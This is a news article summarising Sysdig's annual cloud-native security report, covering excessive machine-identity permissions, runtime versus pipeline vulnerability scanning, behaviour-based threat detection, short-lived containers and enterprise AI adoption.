SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers
Story image

Cloud-native security: Best practices vs. convenience and speed

Wed, 20th Mar 2024

New research has identified a concerning trend among organisations worldwide when developing cloud-native applications: the sacrificing of safety and best practices in favour of speed and convenience.

As the APAC region faces uncertain times and economic headwinds, the temptation to cut corners and shave costs off a development project is likely to increase. However, this must constantly be balanced with the ever-growing threat of cyber risk, especially in light of recent high-profile attacks in the region and the abundance of new technology empowering bad actors.

Sysdig's seventh annual Cloud-Native Security and Usage Report identifies how customers are developing, using, and securing cloud-native applications and environments by analysing data from millions of containers and thousands of accounts. 

The report has identified several critical areas that need to be evaluated in order to secure cloud-native development and help provide a strict, well-governed roadmap for reducing cyber risk from planning and development through to the everyday running of applications.

Identity neglect: A call to action

"Though I am unsurprised by the apprehension around the security of new technologies like AI, I am disheartened by the massive number of excessive permissions being administered, especially for machine identities. It feels a bit like obsessing over a plane crash while regularly running stop signs with no seatbelt on."
 -Anna Belak, Director, Office of Cybersecurity Strategy at Sysdig

Identity management has become the most overlooked cloud attack risk. Only two percent of granted permissions are being used, a reduction year-over-year. Nonhuman applications, tools, and services are being granted thousands of permissions upon initial implementation that are never disabled or de-provisioned. These excessive permissions create an undue risk that is simply unnecessary. Most well-known security incidents with material impacts have been linked to poor management of identities and privileges, and yet only 20% of cloud-native application protection platform (CNAPP) users are prioritising cloud infrastructure entitlements management (CIEM) functions weekly.  

Keep shifting left, we aren't there yet

After a year of prioritising the remediation of critical or high vulnerabilities in use at runtime, the existence of these vulnerabilities has been reduced by nearly 50%. However, the goal of the shift-left approach is to scan for, identify, and remediate vulnerabilities in the pre-delivery pipeline before runtime — and the research suggests this is still not happening. The report found a higher policy failure rate in runtime scans than continuous integration and continuous delivery (CI/CD) build pipeline scans. If organisations were following the concept of shift-left with fidelity, we would expect the opposite of these results since policy failures are meant to be caught prior to delivery and before they become exploitable conditions for attackers.

Threat detection advancing toward maturity

The vast majority of Sysdig customers are leveraging threat detection and response (TDR) insights weekly. With this, we see indications of comprehension and maturity with the development and testing of custom behavioural threat detections. This year's report shows that only 35% of attacks were identified using indicators of compromise (IoCs), while the remaining 65% were identified with behaviour-based detections. The most-commonly triggered detections this year - defence evasion and privilege escalation - fell under the initial access and execution MITRE ATT&CK tactics, which often present themselves earlier in an attack lifecycle than those the report witnessed last year. 

Ephemerality won't save you from an attack
We've seen container lifespan shrink over the last several years, to the extent that 70% of containers live less than five minutes. There is some comfort knowing that a vulnerable container is short-lived. However, Sysdig's Threat Research Team (TRT) stated in the 2023 Global Cloud Threat Report that a cloud attack only takes 10 minutes. With the use of automation, an attacker can enter through a vulnerable container and move laterally before the end of its lifespan. Running vulnerable workloads, no matter how short-lived, leaves an organisation at risk of an attack.

AI adoption paradox
While most of the report's findings this year indicate that organisations choose convenience and speed over more secure practices, we could not attribute this to enterprise AI use. 31% of companies have implemented AI frameworks and packages, but only 15% of these are generative AI. Put simply, most of the AI packages we see right now are used for data correlation and analysis.

Conclusion
From the real-world customer data gathered and analysed, we see an evolving cloud security landscape ripe with successes and struggles. Skirting some security best practices might allow organisations to work with fewer barriers, but it also puts them at far greater risk of attack. For instance, a lack of identity management has resulted in many high-profile material attacks. Conversely, runtime security and TDR prioritisation are reducing vulnerabilities and advancing detection efforts. 

Short-lived workloads are no match for attackers using automation, and it seems that enterprises aren't yet quite ready to implement AI in cloud environments.